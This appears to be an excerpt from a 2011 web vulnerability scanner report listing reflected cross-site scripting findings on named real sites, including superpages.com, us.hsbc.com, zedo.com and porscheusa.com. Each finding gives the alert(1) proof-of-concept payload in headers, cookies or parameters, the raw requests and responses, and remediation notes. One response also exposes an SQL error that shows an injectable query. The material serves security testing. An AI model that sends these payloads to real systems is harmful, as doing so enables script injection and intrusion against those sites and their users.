GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10af436"-alert(1)-"c8d45d1ae80 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750668049-www.superpages.com-11243779-100942; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:31:08 GMT; Path=/ Set-Cookie: JSESSIONID=70291ECCDC9094D55B86156B11544BBB; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:31:07 GMT Content-Length: 65808
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Ally Bank in Philad ...[SNIP]...
var remote_add = "REMOTE_ADDR=173.193.214.243"; var http_user = "HTTP_USER_AGENT=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10af436"-alert(1)-"c8d45d1ae80"; var datServ = 'http://ugc-int.superpages.com'; var imgLoc = "http://img.superpages.com/images-yp/sp/images/ugc/"; var imServ = 'http://media.superpages.com/media/photos/'; var lidforpageload = '2118 ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae894"-alert(1)-"9ef9bbddbcc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1/2/3?command=makeThisMyHome&hp_pref=r HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq; Referer: http://www.google.com/search?hl=en&q=ae894"-alert(1)-"9ef9bbddbcc
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:09:17 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:10:17 GMT Vary: User-Agent,Cookie Content-Length: 5930 Set-Cookie: USIB2G=0000uiCjKm5hpdCoVHLx-JRHofH:14k1jbteq; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
The value of the V cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59a51'-alert(1)-'a6f6442db was submitted in the V cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bh/sync/admeld?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=8&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: bh.contextweb.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754790274&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj59a51'-alert(1)-'a6f6442db; cwbh1=2709%3B03%2F02%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F05%2F2011%3BFOCI1
Response
HTTP/1.1 200 OK Server: Sun GlassFish Enterprise Server v2.1.1 Set-Cookie: V=gFEcJzqCjXJj59a51'-alert(1)-'a6f6442db; Domain=.contextweb.com; Expires=Sun, 29-Jan-2012 18:54:52 GMT; Path=/ Pragma: no-cache Cache-Control: no-cache Expires: -1 Content-Type: text/html; charset=iso-8859-1 Content-Length: 214 Date: Thu, 03 Feb 2011 18:54:52 GMT
The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc04b"-alert(1)-"93a36e51360 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~010411dc04b"-alert(1)-"93a36e51360;z=" + Math.random(); var ainfo = "";
var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd ...[SNIP]...
The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 591c4"-alert(1)-"65b65c1c305 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=&s=134&z=0.00999015336856246 HTTP/1.1 Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411591c4"-alert(1)-"65b65c1c305; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" Vary: Accept-Encoding X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=125 Expires: Thu, 03 Feb 2011 16:12:04 GMT Date: Thu, 03 Feb 2011 16:09:59 GMT Connection: close Content-Length: 2549
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat='';var zzC ...[SNIP]... );}
var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~010411591c4"-alert(1)-"65b65c1c305;z=" + Math.random(); var ainfo = "";
var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd ...[SNIP]...
The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ba9d"-alert(1)-"5d6a06513d5 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fmr.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=&s=134&z=0.00999015336856246 HTTP/1.1 Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~0104119ba9d"-alert(1)-"5d6a06513d5; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" Vary: Accept-Encoding X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=122 Expires: Thu, 03 Feb 2011 16:12:04 GMT Date: Thu, 03 Feb 2011 16:10:02 GMT Connection: close Content-Length: 2537
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat='';var zzC ...[SNIP]... );}
var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~0104119ba9d"-alert(1)-"5d6a06513d5;z=" + Math.random(); var ainfo = "";
var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd ...[SNIP]...
The value of the DMUserTrack cookie is copied into the HTML document as plain text between tags. The payload 6897e<img%20src%3da%20onerror%3dalert(1)>f1b5e532c19 was submitted in the DMUserTrack cookie. This input was echoed as 6897e<img src=a onerror=alert(1)>f1b5e532c19 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /hg.php?uid=B46354F1-787D-4611-AE0D-C5EFA6EF634B&k=e58aac080a2606121e77aba437a3165d&s=http%3A//mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert%281%29%253C/script%253E1f35e8c0ea2/&r=http%3A//burp/show/49&q=0&e=2&cid=&callback=Newstogram.completed HTTP/1.1 Host: da.newstogram.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1105555422-1296072885434; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3%276897e<img%20src%3da%20onerror%3dalert(1)>f1b5e532c19
The value of the RlocalUID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc711"><script>alert(1)</script>103b14f1145 was submitted in the RlocalUID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: gsbmtg.rtrk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319dc711"><script>alert(1)</script>103b14f1145; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:15:19 GMT Server: Apache Set-Cookie: RlocalUID=scid%3D1794967%26cid%3D696829%26tc%3D11020308002595319dc711%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E103b14f1145; domain=.rtrk.com; path=/ Set-Cookie: RlocalHilite=kw_hilite_off%3D0; domain=.rtrk.com; path=/ Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.rtrk.com; path=/ P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR", policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Vary: Accept-Encoding Connection: close Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7645525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:11 GMT;path=/;httponly Content-Length: 2946
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8010f"-alert(1)-"9cee6b4b2f1 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67d78"-alert(1)-"0dfb266372e was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fc74"><script>alert(1)</script>069d9c26fc2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /911GTS-mosaic9fc74"><script>alert(1)</script>069d9c26fc2 HTTP/1.1 Host: porscheusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Thu Feb 3 19:15:05 2011 Server: redirector/2.0 (Unix) Location: http://www22.us.porsche.com/911GTS-mosaic9fc74"><script>alert(1)</script>069d9c26fc2 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Moved Temporarily</TITLE> </HEAD><BODY> <H1>Moved Temporarily</H1> The Document has moved <A HREF="http://www22.us.porsche.com/911GTS-mosaic9fc74"><script>alert(1)</script>069d9c26fc2"> ...[SNIP]...
1.704. http://porscheusa.com/911GTS-mosaic [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://porscheusa.com
Path:
/911GTS-mosaic
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bed1c"><script>alert(1)</script>60964318e57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /911GTS-mosaic?bed1c"><script>alert(1)</script>60964318e57=1 HTTP/1.1 Host: porscheusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Thu Feb 3 19:14:56 2011 Server: redirector/2.0 (Unix) Location: http://www22.us.porsche.com/911GTS-mosaic?bed1c"><script>alert(1)</script>60964318e57=1 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Moved Temporarily</TITLE> </HEAD><BODY> <H1>Moved Temporarily</H1> The Document has moved <A HREF="http://www22.us.porsche.com/911GTS-mosaic?bed1c"><script>alert(1)</script>60964318e57=1"> ...[SNIP]...
The value of the trackerid request parameter is copied into the HTML document as plain text between tags. The payload 4e88d<script>alert(1)</script>4dbb23bcccc was submitted in the trackerid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /www/delivery/rd.php?bannerid=372&trackerid=9774e88d<script>alert(1)</script>4dbb23bcccc&SR=sr3_43119753_ms&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B232825021%3B56698875%3Bs%3Fhttp%3A%2F%2Fwww.us.hsbc.com%2F1%2F2%2F3%2Fhsbcpremier%2Fprom%2Fnov-10%3Fcode%3DPMD0006263%26WT.srch%3D1%26WT.mc_id%3DHBUS_PMD0006263 HTTP/1.1 Host: s1.srtk.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 16:23:52 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Pragma: no-cache Cache-Control: private, max-age=0, no-cache P3P: policyref="http://s1.srtk.net/w3c/s1.xml", CP="NON IVAa HISa OTPa OUR DELa IND UNI PUR COM NAV INT" Set-Cookie: MAXID=22038148057ac3fac5133f97badb01dc; expires=Fri, 03-Feb-2012 16:23:52 GMT; path=/ location: http://ad.doubleclick.net/clk;232825021;56698875;s?http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/nov-10?code=PMD0006263&WT.srch=1&WT.mc_id=HBUS_PMD0006263 Content-Length: 362 Connection: close Content-Type: application/x-javascript
SELECT v.variableid AS variable_id,v.trackerid AS tracker_id,v.name AS name,v.datatype AS type FROM variables AS v WHERE v.trackerid=9774e88d<script>alert(1)</script>4dbb23bcccc
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'd<script> ...[SNIP]...
The value of the Cat2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c5e4"><script>alert(1)</script>e49c418b94f was submitted in the Cat2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /rss/flash_feed.asp?cat=business&Cat2=mortgage2c5e4"><script>alert(1)</script>e49c418b94f HTTP/1.1 Host: www.feedzilla.com Proxy-Connection: keep-alive Referer: http://urlwww--feedzilla--com.rtrk.com/tools/news-widget.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDQCDCDQCR=EBONDDMACNKMJCOEBLEAOEIL
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 16:02:42 GMT Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (l 0 s 0 v 0 o 0)) X-Powered-By: ASP.NET Location: http://api.feedzilla.com/v1/articles.rss?category_name=business&subcategory_name=mortgage2c5e4"><script>alert(1)</script>e49c418b94f&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET Content-Type: text/html; charset=iso-8859-1 Content-Length: 352
